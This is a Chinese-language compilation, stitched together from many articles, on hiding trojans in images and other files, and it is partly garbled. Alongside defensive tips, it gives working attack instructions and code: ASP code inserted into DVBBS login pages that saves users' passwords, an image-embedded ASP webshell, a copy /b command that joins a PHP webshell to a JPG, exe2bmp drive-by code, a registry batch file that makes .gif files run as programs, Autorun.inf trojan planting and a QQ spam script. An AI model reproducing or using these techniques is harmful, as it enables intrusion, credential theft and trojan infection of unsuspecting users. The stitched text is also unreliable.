图片绑定木马

木马捆绑与隐藏12.2.1 背景描述木马并不是合法的网络服务程序，如果单纯以本来面目出现，很容易被网络用户识别。

为了不被别人发现，木马制造者必须想方设法改换面貌；为了诱使网络用户下载并执行它，黑客将木马程序混合在合法的程序里面，潜入用户主机。

在受害主机里，为了逃避杀毒软件的查杀，木马也会将自己“乔装打扮”；为了防止用户将其从系统里揪出来，木马则采取一切可能的手法进行隐藏自己。

总之，现在的木马制造者是越来越狡猾，他们常用文件捆绑的方法，将木马捆绑到图像、纯文本等常见的文件中，然后通过网页、QQ、Email 或MSN 等将这些文件传送给受害者，而用户一旦不慎打开这些文件，木马就自动执行了，主机就中木马了。

12.2.2 工作原理1．木马捆绑木马捆绑即是文件捆绑，黑客将木马或者病毒等恶意程序与其它正常文件组合成的一个整体。

这是一种最简单也是最可行和最常用的一种方法，当受害者下载并运行捆绑了木马等恶意程序的文件时，其中的木马等恶意程序就会被激活。

木马捆绑的手段归纳起来共有四种：（1）利用捆绑机软件和文件合并软件捆绑木马；（2）利用WINRAR、WINZIP 等软件制作自解压捆绑木马；（3）利用软件打包软件制作捆绑木马；（4）利用多媒体影音文件传播。

2．木马隐藏隐藏是一切恶意程序生存之本。

以下是木马的几种隐藏手段：（1）进程隐蔽：伪隐藏，就是指程序的进程仍然存在，只不过是让它消失在进程列表里。

真隐藏则是让程序彻底的消失，不以一个进程或者服务的方式工作，做为一个线程，一个其他应用程序的线程，把自身注入其他应用程序的地址空间。

（2）伪装成图像文件：即将木马图标修改成图像文件图标。

（3）伪装成应用程序扩展组件：将木马程序写成任何类型的文件（如dll,ocx等），然后挂在十分出名的软件中。

因为人们一般不怀疑这些软件。

（4）错觉欺骗：利用人的错觉，例如故意混淆文件名中的1（数字）与l（L的小写）、0（数字）与o（字母）或O（字母）。

最新木马后门植入工具RobinPE将木马后门与图片或程序伪装捆绑在一起，诱使别人打开图片或执行程序，从而在后台悄悄运行木马后门，这是一种常见的木马植入手段。

图片木马制造机、EXEBind等，各种各样木马捆绑合并工具大家都见得很多了，使用这些木马捆绑工具虽然可以有效地对木马进行伪装，但是面对嗅觉灵敏的杀毒软件和警惕性安全性日趋提高的上网者来说，这些捆绑工具难免会暴露一些缺点。

比如，宿主文件大小在捆绑木马后会发生变化，对于一些体积较大的木马，捆绑后的文件体积变化尤其明显，稍微细心些的用户就很容易识破这种捆绑手段。

有没有隐藏性更高一些的木马捆绑工具呢？是否可以在捆绑了木马后让宿主文件体积不发生变化呢？最新的木马后门植入工具RobinPE，可以将后门文件藏匿在任意的EXE程序文件中，以后每次正常启动程序文件时，我们植入的文件就会悄悄的生成并执行，最重要的是植入木马后宿主文件的大小基本不发生变化。

下面就以笔者的使用经历为例，向大家介绍一下这个工具的使用吧！一、准备植入木马首先是利用系统漏洞，溢出得到了一台主机Local System权限的Shell，然后克隆管理员帐号，清除了杀毒软件之类的文件上传障碍。

其具体过程就不再详述了，下面主要是讲述如何将木马植入Explorer.exe进程中，再将其上传到远程主机上执行并进行控制。

首先需要在本地将木马植入Explorer.exe文件中，这里我们使用一个叫作“Fuck Trojan”的木马，并将对服务端程序“Server.exe”加壳处理以躲过杀毒软件的查杀。

备份“Explorer.exe”文件，然后运行工具RobinPE。

二、计算空间——木马植入前的关键使用RobinPE在正常程序中植入木马后，有一个特点就是程序将保护原来的体积大小不发生变化，从而不易被查觉。

其原理就是在植入前先执行计算程序文件可利用的空间，将后门木马植入缝隙而不额外增加代码区块，因此文件的大小不会发生变化。

现在的牧“马”者是越来越狡猾，他们常用文件捆绑的方法，将木马捆绑到图像、纯文本等常见的文件中，然后通过QQ、Email或MSN等将这些文件传送给受害者，而一旦不慎打开这些文件，你就“中招”了(当然是木马了)。

那对付这些捆绑木马有哪些通用规则值得我们平时注意的?第一招:常用杀毒软件这是最安全、最经典的防御方法了，特别是对通过QQ、MSN等即时通讯工具传送过来的文件，在打开他们之前一定要用杀毒软件查毒。

对于一些常见的木马，只要升级到最新病毒库，一般均可以查杀。

如笔者的Norton2002就对mill.bmp这个文件给出染毒提示，如图1所示。

在MSN Messenger中，选择“工具→选项”，再单击“消息”标签，在“文件传输”下，选中“使用下列程序进行病毒扫描”复选框，然后选择相应的杀毒程序，可以让MSN对传输的文件自动杀毒(如图2)。

第二招:显示文件全名其实很多牧“马”者是利用Windows默认的“隐藏已知类型文件扩展名”，比如把木马文件改名为a.jpg 的形式，同时文件图标又用常见图像图标来增强迷惑性，如图3所示，这里a.jpg实际上是a.jpg.exe这个可执行程序。

牧“马”者将木马捆绑到一幅JPG图片中，当你双击打开这个文件时，的确实是一幅JPG图片，而木马却在后台偷偷的运行了。

解决方法:打开“我的电脑”，单击“工具→文件夹选项”，单击“查看”，去除“隐藏已知类型文件扩展名”前的小钩(如图4)。

这样如果碰到类似a.jpg.exe的文件就可以看到它的真面目，并格外小心了。

第三招:善用进程监视如上所述，被捆绑木马是当我们打开一个文件的时候，它就在后台运行，比如说在打开一个图像文件的时候，除了看图程序外还应该有一个进程在运行。

这样我们在打开这类文件时，先用Ctrl+Alt+Del调出系统当前的进程列表并记下，打开文件后迅速切换到任务管理器窗口查看，多出的那个进程就是被释放出来的木马了。

小提示有些木马程序非常的小巧，它的安装过程也是一晃而过，所以切换到任务管理器速度也要快。

木马的常见四大伪装欺骗行为1、将木马包装为图像文件首先，黑客最常使用骗别人执行木马的方法，就是将特洛伊木马说成为图像文件，比如说是照片等，应该说这是一个最不合逻辑的方法，但却是最多人中招的方法，有效而又实用。

只要入侵者扮成美眉及更改服务器程序的文件名(例如sam.exe)为“类似”图像文件的名称，再假装传送照片给受害者，受害者就会立刻执行它。

为甚么说这是一个不合逻辑的方法呢？图像文件的扩展名根本就不可能是exe，而木马程序的扩展名基本上又必定是exe，明眼人一看就会知道有问题，多数人在接收时一看见是exe文件，便不会接收了，那有什么方法呢？其实方法很简单，他只要把文件名改变，例如把“sam.exe”更改为“sam.jpg”，那么在传送时，对方只会看见sam.jpg了，而到达对方电脑时，因为windows默认值是不显示扩展名的，所以很多人都不会注意到扩展名这个问题，而恰好你的计算机又是设定为隐藏扩展名的话，那么你看到的只是sam.jpg了，受骗也就在所难免了！还有一个问题就是，木马本身是没有图标的，而在电脑中它会显示一个windows预设的图标，别人一看便会知道了！但入侵者还是有办法的，这就是给文件换个“马甲”，即用IconForge等图标文件修改文件图标，这样木马就被包装成jpg或其他图片格式的木马了，很多人会不经意间执行了它。

2、以Z-file伪装加密程序Z-file伪装加密软件经过将文件压缩加密之后，再以bmp图像文件格式显示出来(扩展名是bmp，执行后是一幅普通的图像)。

当初设计这个软件的本意只是用来加密数据，用以就算计算机被入侵或被非法使使用时，也不容易泄漏你的机密数据所在。

不过如果到了黑客手中，却可以变成一个入侵他人的帮凶。

使用者会将木马程序和小游戏合并，再用Z-file加密及将此“混合体”发给受害者，由于看上去是图像文件，受害者往往都不以为然，打开后又只是一般的图片，最可怕的地方还在于就连杀毒软件也检测不出它内藏特洛伊木马和病毒。

巧用技巧揪出图片背后的木马病毒导读:木马病毒属于病毒的一类，主要是进行盗取账号密码信息、远程控制用户电脑、破坏操作系统等操作。

并且，为了防止杀毒软件对它的查杀，通常具有很强的隐蔽性和反侦察性。

多数木马病毒感染后，首先试图强行关闭杀毒软件，然后才开始盗取账号，有的木马病毒甚至会将国内外主流杀毒软件先各个击破。

最近一段时间，从各大杀毒软件厂商发布的病毒报告中可以看到，木马病毒目前在互联网上泛滥情况十分严重，并且已经形成完整的病毒产业链。

它是如何入侵电脑?作为普通网民又应如何防范?有许多的用户发现自己的电脑有问题，但却找不出原因，是中了木马不假，但就是找不出是哪的问题，后来监测到有数据在上传时，在图片中找到了藏于其中的木马病毒，也终于把它揪出来了。

看一下具体内容：攻击者利用微软GDIplus安全漏洞将木马藏于图片中，注意是藏而不是捆绑，这个不同于以前把木马伪装成图片，引诱网民去点击，而是实实在在的图片变成了木马。

受微软GDIplus安全漏洞影响，几乎所有浏览器、即时聊天工具、Office 程序以及看图软件等都可能成为木马传播的渠道。

只要通过浏览器浏览、看图软件打开、甚至是QQ、MSN、电子邮件、Office文档里查看这些图片，就会中招!管你是一个QQ表情还是一个有着上万个层的PNG图片，看了就木马你!这个安全漏洞就是微软GDIplus图片漏洞，堪称是微软有史以来最大的安全漏洞。

GDIplus是一种图形设备接口，能够为应用程序和程序员提供二维矢量图形、映像和版式。

GdiPlus.dll通过基于类的API提供对各种图形方式的访问。

它在解析特制的BMP文件时存在整数溢出漏洞，利用此漏洞的攻击者可完全控制系统，可通过这个漏洞安装更多的木马程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。

这个GDIplus漏洞非常严重，类似以前的光标漏洞和wmf 漏洞，但是涉及范围广，几乎涵盖了所有的图形格式。

了解了以上的问题，电脑用户就要慎重对待自己收到的图片了，一定要先杀一杀病毒再打开，以防中招，但这个问题也是可以解决的，因为微软GDIplus安全漏洞的专门补丁也已出现了，只要下载运行就把问题化险为夷了。

1.名称：自己如何动手制作图片形式的ASP木马（还要可显示图片）建一个asp文件，内容为找一个正常图片ating.jpg，插入一句话木马（比如冰狐的）,用ultraedit进行hex编译，插入图片里，为了运行成功，还要搜索 shell代码插在这里，最好是小马，还要加密一下访问的时候在你作手脚的asp文件后面加上?action=ok,即可 (2)另一种方法，在我们要做手脚的asp文件里加入如下内容访问的时候在做手脚的asp文件后面加上?filer=XXX XXX 为你本地上传的一个路径如 c:ating123.asp 上传后在做手脚的asp的同文件夹中有ating,asp （3）前提得到system权限，进入网站目录下一层 mkdir s… copy ating.asp s…/ 这样杀毒软件找不到的访问http://网站/s…/ating.asp即可 6. 工具/chaojiyonghu.rar，此工具在该电脑生成一个超级用户用户名为：hack 密码110，在DOS下和计算机管理器上看不到你建立的用户，并且是删除不掉的. 7．名称：QQ群脚本攻击打开qq对话诓，复制消息，然后下面的内容保存为.vbs 文件，运行即可 Set WshShell= WScript.createobject("WScript.Shell") WshShell.AppActivate "QQ信息攻击脚本" for i=1 to 20 WScript.Sleep 1000 WshShell.SendKeys"^v" WshShell.SendKeys i WshShell.SendKeys "%s" Next 8．搜索：程序制作：万鹏有免费申请空间的，直接上传asp马即可 9. 名称：全面找出你站上的ASP木马（1）用杀毒软件（2）用FTP客户端软件，点"工具"->"比较文件夹" （3）用asplist2.0.asp上传到站点空间查看，一般功能多的ASP我估计就是ASP木马（4）用工具Beyond Compare 10名称：拓展思路拿DVBBS帐号 "一个人的圣经"的动画（1）以前获得webshell后想进入DVBBS的后台,想要管理员的密码，可以这样老办法: 修改admin_login.asp得到明文DVBBS后台密码在"username=trim(replace(request("username")这行后面 Dim fsoObject Dim tsObject Set fsoObject = Server.createObject("Scripting.FileSystemObject") set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt")) tsObject.Write CStr(request("password")) Set fsoObject = Nothing Set tsObject = Nothing 只要管理员登陆后台，在目录下就生成了laner.txt （2）login.asp中Case "login_chk"下: on error resume next Dim rain set rain=server.createobject("adodb.stream") rain.Type=2 rain.CharSet="gb2312" rain.Position=rain.Size rain.Open rain.LoadFromFile server.MapPath("laner.asp") rain.writetext now&request("username")&"text:"&request("password")&chr(10) rain.SaveToFile server.MapPath("laner.asp"),2 rain.Close set rain=nothing 这样laner.asp将获得全部登陆人的登陆时间，用户名和密码（3）如果你有自己的网站或者另外的webshell(强烈建议使用): 可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp: 11. 名称：利用QQ在线状态抓鸽子肉鸡生成qq在线状态，把里面的地址改成木马地址，发到论坛在login.asp那里插入一句: response.write""response.write"" 结果所有登陆人都会乖乖的把名字和密码送到你的laner.asp 里 12. 动画名称：媒体中国整站程序存在多处漏洞漏洞程序:媒体中国整站程序(第一版) 官方网站:/ 漏洞: %5c(暴库) 上传注入上传页面:down1/upload.asp 13. 名称：免费电话＋MSH命令行工具 / 打开主页，点击坐下角，Free DownLoad，下载到本地，安装，运行后，会提示正在寻找你所在地区的区号。

黑客技巧之利用图片做木马应用完全解析何谓BMP网页木马？它和过去早就用臭了的MIME头漏洞的木马不同，MIME木马是把一个EXE文件用MIME编码为一个EML(OUT LOOK信件)文件，放到网页上利用IE和OE 的编码漏洞实现自动下载和执行。

然而BMP木马就不同，它把一个EXE文件伪装成一个BMP图片文件，欺骗IE自动下载，再利用网页中的JA V ASCRIPT脚本查找客户端的Internet临时文件夹，找到下载后的BMP 文件，把它拷贝到TEMP目录。

再编写一个脚本把找到的BMP文件用DEBUG还原成EXE，并把它放到注册表启动项中，在下一次开机时执行。

但是这种技术只能在Windows9X下发挥作用，对于Windows2000、WindowsXP来说是无能为力了。

看上去好象很复杂，下面我们一步一步来：EXE变BMP的方法大家自己去查查BMP文件资料就会知道，BMP文件的文件头有54个字节，简单来说里面包含了BMP文件的长宽、位数、文件大小、数据区长度，我们只要在EXE文件的文件头前面添加相应的BMP文件头(当然BMP文件头里面的数据要符合EXE文件的大小啦)，这样就可以欺骗IE下载该BMP文件，开始我们用JPG文件做过试验，发现如果文件头不正确的话，IE是不会下载的，转换代码如下：program exe2bmp;usesWindows,SysUtils;var len,row,col,fs: DWORD;buffer: array[0..255]of char;fd: WIN32_FIND_DATA;h,hw: THandle;beginif (ParamStr(1)’’) and(ParamStr(2)’’) then begin //如果运行后没有两个参数则退出if FileExists(ParamStr(1)) then beginFindFirstFile(Pchar(ParamStr(1)),fd);fs:=fd.nFileSizeLow;col := 4;while true do beginif (fs mod 12)=0 then beginlen:=fs;end else len:=fs+12-(fs mod 12);row := len div col div 3;if row>col then begincol:=col+4;end else Break;end;FillChar(buffer,256,0);{一下为BMP文件头数据}B;WriteFile(hw,buffer,54,col,0);repeatReadFile(h,buffer,256,col,0);WriteFile(hw,buffer,col,col,0);untilcol256;WriteFile(hw,buffer,len-fs,col,0);CloseHandle(h);CloseHandle(hw);end;end;end.以上代码可以在DELPHI4、5、6中编译，就可以得到一个exe2bmp.exe文件。

木马是大家网上安全的一大隐患，说是大家心中永远的痛也不为过。

对于木马采用敬而远之的态度并不是最好的方法，我们必须更多地了解其“习性”和特点，只有这样才能做到“知己知彼，百战不殆”！随着时间的推移，木马的植入方式也悄悄地发生了一定的变化，较之以往更加的隐蔽，对大家的威胁也更大，以下是笔者总结的五种最新的木马植入方式，以便大家及时防范。

方法一：利用共享和Autorun文件为了学习和工作方便，有许多学校或公司的局域网中会将硬盘共享出来。

更有甚者，竟将某些硬盘共享设为可写！这样非常危险，别人可以借此给您下木马！利用木马程序结合Autorun.inf文件就可以了。

方法是把Autorun.inf和配置好的木马服务端一起复制到对方D 盘的根目录下，这样不需对方运行木马服务端程序，只需他双击共享的磁盘图标就会使木马运行！这样作对下木马的人来说的好处显而易见，那就是大大增加了木马运行的主动性！许多人在别人给他发来可执行文件时会非常警惕，不熟悉的文件他们轻易不会运行，而这种方法就很难防范了。

下面我们简单说一下原理。

大家知道，将光盘插入光驱会自动运行，这是因为在光盘根目录下有个Autorun.inf文件，该文件可以决定是否自动运行其中的程序。

同样，如果硬盘的根目录下存在该文件，硬盘也就具有了AutoRun功能，即自动运行Autorun.inf文件中的内容。

把木马文件.exe文件以及Autorun.inf放在磁盘根目录（这里假设对方的D盘共享出来且可写），对于给您下木马的人来说，他还会修改Autorun.inf文件的属性，将该文件隐藏起来。

这样，当有人双击这个盘符，程序就运行了。

这一招对于经常双击盘符进入“我的电脑”的人威胁最大。

更进一步，利用一个.REG文件和Autorun.inf结合，还可以让你所有的硬盘都共享出去！方法二：把木马文件转换为BMP格式这是一种相对比较新颖的方式，把EXE转化成为BMP来欺骗大家。

其原理是：BMP文件的文件头有54个字节，包括长度、位数、文件大小、数据区长度。

浅析木马捆绑伪装的多种方式作者：于海雯来源：《电脑知识与技术》2012年第30期摘要：介绍了木马捆绑伪装的几种方式，并分析了各种方式的原理及其优劣。

关键词：文件捆绑；常规捆绑；压缩捆绑；插入捆绑；克隆捆绑中图分类号：TP39 文献标识码：A 文章编号：1009-3044（2012）30-7214-02木马之所以狡猾，是因为它除了能躲避杀毒软件的查杀外，还能诱骗用户运行。

木马伪装，以捆绑方式最为常见，将恶意程序和正常的文件进行捆绑，是黑客最常用、最可行、最简单的方式，当受害者运行这些捆绑了恶意程序的文件后，电脑就在不知不觉中中招了！而且，几乎所有格式的文件，都能捆绑上木马，包括很多人认为不会带病毒的文件，比如：电影文件.rm、图片格式文件.jpg、等，都无一幸免！其中电影文件.rmvb一般是捆绑了弹窗广告，而大多数广告链接网站都有毒！所以去除广告链接，就安全了。

如果我们能对木马的捆绑伪装方式有充分地了解，知己知彼，那么就可以更好地保护我们的计算机系统不受侵害。

1 文件捆绑文件捆绑，当然需要捆绑器软件，捆绑器的使用一般分为以下几个步骤：1）添加捆绑文件，包括要捆绑的恶意程序和被捆绑的正常文件，比如：各种图片、迷你小游戏、FLASH动画文件，等；2）设置捆绑的属性并选择捆绑后的文件图标；3）合并生成相应的文件。

读者可以上网随意下个捆绑机软件，比如“EXE捆绑机”软件，可以将两个可执行文件（.exe文件）捆绑成一个文件，运行捆绑后的文件等于同时运行了两个文件；它会自动更改图标，使捆绑后的文件与捆绑前的文件图标一样。

文件捆绑，具体来讲，又分为常规捆绑、压缩捆绑、插入捆绑、克隆捆绑，等多种方式。

下面，本文将分析目前常见的几种木马捆绑伪装方式，从而让大家更好地了解木马运行的整个流程。

2 常规捆绑常规捆绑比较简单，比如，“南城剑盟捆绑器”，功能非常专业强大，具有对捆绑文件修改属性、日期时间，图标提取、修改图标、释放路径配置等功能。

木马常见植入方法大曝光对于给你下木马的人来说，一般不会改变硬盘的盘符图标，但他会修改Autorun.inf文件的属性，将该文件隐藏起来。

然后按F5键刷新，这样，当有人双击这个盘符，程序就运行了。

这一招对于经常双击盘符进入“我的电脑”的人最有效。

识别这种伪装植入方式的方法是，双击盘符后木马程序会运行，并且我们不能进入盘符。

4把木马文件转换为图片格式这是一种相对比较新颖的方式，把EXE转化成为BMP图片来欺骗大家。

原理：BMP文件的文件头有54个字节，包括长宽、位数、文件大小、数据区长度。

我们只要在EXE的文件头上加上这54字节，IE就会把它当成BMP文件下载下来。

改过的图片是花的，会被人看出破绽，用＜imgscr＝″xxx.bmp″higth＝″0″width＝″0″＞，把这样的标签加到网页里，就看不见图片了，也就无法发现“图片”不对劲。

IE 把图片下载到临时目录，我们需要一个JavaScript文件在对方的硬盘里写一个VBS文件，并在注册表添加启动项，利用那个VBS找到BMP，调用debug来还原EXE，最后，运行程序完成木马植入。

下一次启动时木马就运行了，无声无息非常隐蔽。

5伪装成应用程序扩展组件此类属于最难识别的特洛伊木马，也是骗术最高的木马。

特洛伊木马编写者用自己编制的特洛伊DLL替换已知的系统DLL，并对所有的函数调用进行过滤。

对于正常的调用，使用函数转发器直接转发给被替换的系统DLL，对于一些事先约定好的特殊情况，DLL会执行一些相对应的操作。

一个比较简单的方法是启动一个进程，虽然所有的操作都在DLL中完成会更加隐蔽，但是这大大增加了程序编写的难度。

实际上这样的木马大多数只是使用DLL进行监听，一旦发现控制端的连接请求就激活自身，起一个绑端口的进程进行正常的木马操作。

操作结束后关掉进程，继续进入休眠状况。

举个具体的例子，黑客们将写好的文件（例如DLL、OCX等）挂在一个十分出名的软件中，例如QQ中。

高危木马专偷隐私央视曝光“照片大盗”
网民李女士近日发现，自己的私密照片出现在了不正规的交友网站上。

据央视“关注
个人信息安全”节目报道称，李女士电脑中了一种名为“照片大盗”的木马，该木马会检索电脑中的照片并发送到黑客服务器上。

360安全工程师万仁国接受央视采访时表示，“照片大盗”主要通过伪装热门网络资源传播，提醒网友下载文件时先用360等安全软件“消毒”。

央视对木马实际演示发现，一旦电脑没有安装安全软件，运行木马后，电脑上的图片
文件会自动发送到另一台由“黑客”控制的电脑中。

据网络安全工程师分析，此类“照片大盗”会筛选大于100KB的JPG、PNG等图片格式文件，对用户隐私造成严重危害。

360工程师指出，“照片大盗”木马往往会伪装成常用软件或视频种子等文件，并通过恶意电影下载网站或者论坛进行传播。

如果用户电脑没有开启安全软件“木马防火墙”，木马就会在受害者毫无察觉的情况下激活，并扫描发送图片文件到黑客电脑中。

专家建议，从陌生可疑网站下载文件时，最好先用360安全卫士等安全软件进行扫描，确认文件安全后再打开。

如果被安全软件明确提示为木马病毒风险，应立即删除该文件。

文件上传漏洞防御——图片写马的剔除最近回顾了一下CasperKid大牛在2011年11月发布的Upload Attack Framework，非常有感触，写得非常好，想深入了解这个漏洞的都推荐看看。

AD： 2013大数据全球技术峰会低价抢票中最近回顾了一下CasperKid大牛在2011年11月发布的Upload Attack Framework，非常有感触，写得非常好，想深入了解这个漏洞的都推荐看看。

上传功能常见于图片的上传，例如博客头像设置，广告位图片上传等。

上传检测方法在paper中也写的比较明朗，这里总结一下：1. 客户端使用JS对上传图片做检测，例如文件大小，文件扩展名，文件类型2. 服务端检测，例如文件大小(免得拒绝服务)，文件路径(避免0x00截断，目录遍历)，文件扩展名(避免服务器以非图片的文件格式解析文件)，文件类型(避免修改Content-Type为image/jpeg等)，文件内容(避免图片写马)上传检测绕过的方法，也总结一下：1.客户端检测，相当于没有检测，可以使用HTTP代理例如burp绕过2.服务端检测，一般采用白名单+黑名单的方式，但也极有可能出纰漏。

例如大小写，不在名单内的特例，操作系统bt特性(windows系统会自动去掉文件名最后面的点和空格)，0x00截断，服务器文件解析漏洞，最后还有图片写马绕过类型检测本篇博客重点讲讲图片写马的检测。

我们知道PHP中文件类型的检测可以使用1.$_FILES['uploaded']['type'];2.getimagesize两种方式来判断是否是正常图片，其实只要在不破坏图片文件格式的情况下，就可以绕过检测例如使用以下命令，将正常图片与一句话php木马绑定在一起生成一个新的文件的方式copy /b tangwei.jpg+yijuhua.php tangweiyijuhua.jpg我们查看新生图片的内容，在图片底端可以看到一句话木马写入，如下图所示strings tangweiyijuhua.jpg接下来我们演示这张图片是否能正常上传。

木马的常用伪装手段
1木马程序更名:为增强木马程序的欺骗性，木马的设计者通常会给木马取一个极具迷惑性的名称(一般与系统文件名相似，如svchOsto Exe等)或者允许控制端用户自由设定安装后的木马文件名。

这就使得用户很难判断所感染的木马类型。

2扩展名欺骗:这是黑客惯用的一-种手法，其主要是将木马伪装成图片、文本、Word文档等文件，以掩饰自己真实的文件类型，例如将木马程序的名称为“文件名.exe"的文件改为“文件名txtexe”。

此时，用户只需把该文件的扩展名显示出来，就可以轻松识别出此文件的类型。

3修改程序图标:木马服务端所用的图标有一定的规律可循,木马经常故意伪装成常用图标的形式(例如文本文件的图标)，等待用户因为疏忽而将其认为是应用程序图标而双击启动。

4捆绑文件:这种方式是将木马捆绑到- -个安装程序中，当用户双击启动程序时，木马就会随之启动，并运行于计算机系统中。

被捆绑的文件一般是可执行文件，例如后缀名为“.Exe”,“.COM”之类的文件。

5定制端口:老式木马的端口都是固定的，这位用户判断电脑是否带有木马带来了方便o现在很多木马都加入了定制
端口的功能，控制端用户可以在“1024-6535”之间任意选择一个端口作为木马端口，这样大大提高了用户判断电脑感染木马类型的难度。

6自我复制:是为了弥补木马的一个缺陷而设计的当服务端用户打开含有木马的文件后，木马会将自己复制到系统目录中(C:WINDOWS System或C:WINDOWS\System32目录)。

一招破解图片防盗链+破解网页不能复制+禁用鼠标右键的方法大全教你一招破解图片防盗链有时候许多网站为了防止自己网站的图片被盗链，往往采用反盗链技术。

比如新浪的图片，还有搜狐，百度等等。

图片有防盗链,应该怎么把它链接过来?要破解这种盗链技术是有方法的——发图片的时候直接在图片地址前加上一链接.方法如下:/tp.asp?url=要引用图片地址（也就是在点开发图片的那个框里最前面先加上这个网址，再加上图片链接地址就OK了）------------------------------------------------------------------------------------------------------------------------------------ 破解网页不能复制★一、通过使用IE浏览器“文件”下拉菜单中的“发送”之“电子邮件页面”的操作，在电子邮件页面中去复制，从而实现下载的目的。

★二、可以通过使用IE浏览器“的编辑器功能，如WORD等软件，在编辑状态下可以实现复制和下载。

复制网页地址,打开Microsoft Office Word,点击"文件"——“打开”，在弹出的对话框中填出刚才复制的网页地址或者按下ctrl＋v组合键，点“打开”按钮，在打开网页之前，可能会弹出“Word 没有足够的内存，此操作完成后无法撤消。

是否继续？”的提示窗口，单击“是”，即弹出新的窗口，询问是否信任文件来源，再单击“是”后，Word会自动链接到对应的服务器并打开网页，这时我们就可以选中其中的文字进行复制粘贴了。

另外，此法在WPS2005中也可以使用，操作起来十分方便。

这样复制、剪切随君所愿。

★三、可以通过使用IE浏览器“查看”菜单之“源文件”功能，在弹出的窗口中可以找到你需要复制和下载的内容，但没有格式。

除此之外，还可以通过其他比较具有特殊功能的浏览器，如火狐等，实现一般IE浏览器所不能实现的功能。

图片文件捆绑木马揭秘作者：刘英来源：《电脑爱好者》2011年第22期听说图片文件可以携带木马侵入用户的电脑图谋不轨，但一直没有亲自遇到过。

上星期遇到的事情，让我有机会亲身经历了与木马图片的正面碰撞，彻底解开了这一谜团。

偶用木马某日，朋友突然向我求救，说网络游戏的号被盗了。

由于朋友是在家上网的，排除了在公共场所账号和密码被别人偷窥的可能。

据朋友说，被盗之前的半日内她一直没有安装什么软件，也没有上网浏览，只是在埋头用Word写工作总结，但在被盗的前一个小时，她根据自动通知栏内的信息，收到一封精美的邮件，附件中显示有一幅照片的打包文件，邮件正文声称说这幅图片是不明飞行物扔下来的稀世珍宝的照片。

根据这封邮件驴唇不对马嘴的描述，朋友怀疑是不是这封邮件有问题。

我了解到，收到邮件后，朋友是用WinXP自带的“Windows图片和传真查看器”打开的照片，并肯定这是一幅照片文件没问题，而且看得清清楚楚后缀名是.gif格式。

电话中得知，朋友的那封邮件还在。

于是，我让朋友把那封邮件给我转发一封，我要看个究竟。

因为已经怀疑问题发生在这封邮件上，所以我对邮件内容十分小心谨慎。

由于怀疑问题发生在这封邮件的图片附件上，所以，我根本不打算去直接浏览这幅图片。

分析木马打开邮件，解压附件中的RAR压缩包后，我发现了附件中的那个文件其实并不是朋友所说的gif文件，命名是一个exe文件，文件名是“新奇照片.gif.exe”，并且它的图标也是图片文件的图标。

这下我明白了，原来朋友的电脑使用了系统默认的开启“隐藏已知文件类型的扩展名”的选项（在“我的电脑”窗口之“工具→文件夹选项→查看→高级设置”中）（见图1），所以她告诉我的后缀名gif其实不是真正的文件后缀名，这只是一个假象。

而我的电脑，为了防止恶意软件在作怪，文件名后缀显示和隐含文件显示这两个选项早已被我打开了，因而对收到的任何在后缀名上做过手脚的文件均一览无余。

知道问题可能发生在这个文件的后缀上，问题就好办了，我不打算直接运行这个exe文件，但是，我要剖开这个文件看看它里面到底藏有什么阴谋。

QQ挂马方法揭密导读:有无数上网用户每天都在使用QQ，大家往往注重于QQ尾巴病毒、QQ传木马之类的攻击方式，却很少有人注意到我们经常访问的QQ群、QQ空间里面隐藏着更大的安全危险，远比QQ尾巴病毒、QQ传木马之类的隐蔽得多，危害更加大。

今天我们就来看看攻击者是如何在QQ群和QQ空间中..有无数上网用户每天都在使用QQ，大家往往注重于QQ尾巴病毒、QQ传木马之类的攻击方式，却很少有人注意到我们经常访问的QQ群、QQ空间里面隐藏着更大的安全危险，远比QQ尾巴病毒、QQ传木马之类的隐蔽得多，危害更加大。

今天我们就来看看攻击者是如何在QQ群和QQ空间中挂上网页木马，攻击浏日期览用户的！一、QQ群中简简单单挂木马在一个比较火的QQ群里挂上网页木马，一定很容易得到许多肉鸡的。

怎么在QQ群里挂马，是在群里面群发木马的网址吗?现在已经不会有人上这样的当了。

我们要作的只是在群里面发一个作了手脚的帖子。

步骤一：制作网页木马在攻击前，我们首先要制作好一个木马网页。

这里笔者使用了“上兴远程控制木马V2006”，这个木马功能非常强，以前笔者曾作过介绍。

用上兴生成木马服务端程序“muma.exe”后，将服务端上传到某个网站上去，假设地址为“/muma.exe”。

打开“南域剑盟网页木马生成器”，在中间的“URL”处填入木马的链接地址，点击“生成”按钮，将会在生成器当前目录下生成一个名为“script.txt”的文件(如图1)。

用记事本打开刚才生成的“script.txt”文件，可以看到木马代码，代码是经过加密的，一般人很难看出这是网页木马代码来(如图2)。

复制所有代码，然后将代码插入到任意一个正常的网页中，就可以得到一个网页木马了。

小提示:将木马代码插入正常的网页中，其位置一般是位于“”标记中间。

图1 用木马生成器生成木马代码图2 加密的木马代码步骤二：制作SWF木马在以前的QQ群中，本来只需要发一张带图片的帖子就可以实现挂马的目的。

你见过gif、jpg、jpeg、bmp等后缀文件当做木马你见过gif、jpg、jpeg、bmp等后缀文件当做木马来运行吗？一个小技巧可以把任意后缀文件当做EXE程序文件来运行。

更改exe为gif：@echo offcolor 1AECHO Windows Registry Editor Version 5.00>gif.regECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]》gif.regECHO “Content Type”=“application/x-msdownload”》gif.regECHO @=“exefile”》gif.regregedit /s gif.reg>nul 2>nuldel /s gif.reg>nul 2>nul这个代码保存成。

BAT的文件。

先运行这个BAT文件系统会把。

GIF文件来当做应用程序来运行当然我们的木马后缀要换成。

GIF 的，嘻嘻。

恢复gif默认：@echo offcolor 1AECHO Windows Registry Editor Version 5.00>gif.regECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.gif]》gif.regECHO “Content Type”=“image/gif”》gif.regECHO @=“giffile”》gif.regregedit /s gif.reg>nul 2>nuldel /s gif.reg>nul 2>nul这个代码保存成。

BAT的文件。

大家可以发挥想象，有很多可以利用的地方。

环境变量的利用。

有时候我们在webshell下查看系统变量的时候总能得到一些惊喜，比如系统默认的是Path这个环境变量的值是：%SystemRoot%\system32;%SystemRoot%;%SystemRoot%\S ystem32\Wbem;假如系统装过php的话，那么它的环境变量可能是c:\php\;%SystemRoot%\system32;%SystemRoot%;%SystemRoot %\System32\Wbem;那么我们就有机可乘了，因为它的顺序在系统默认的路径前面。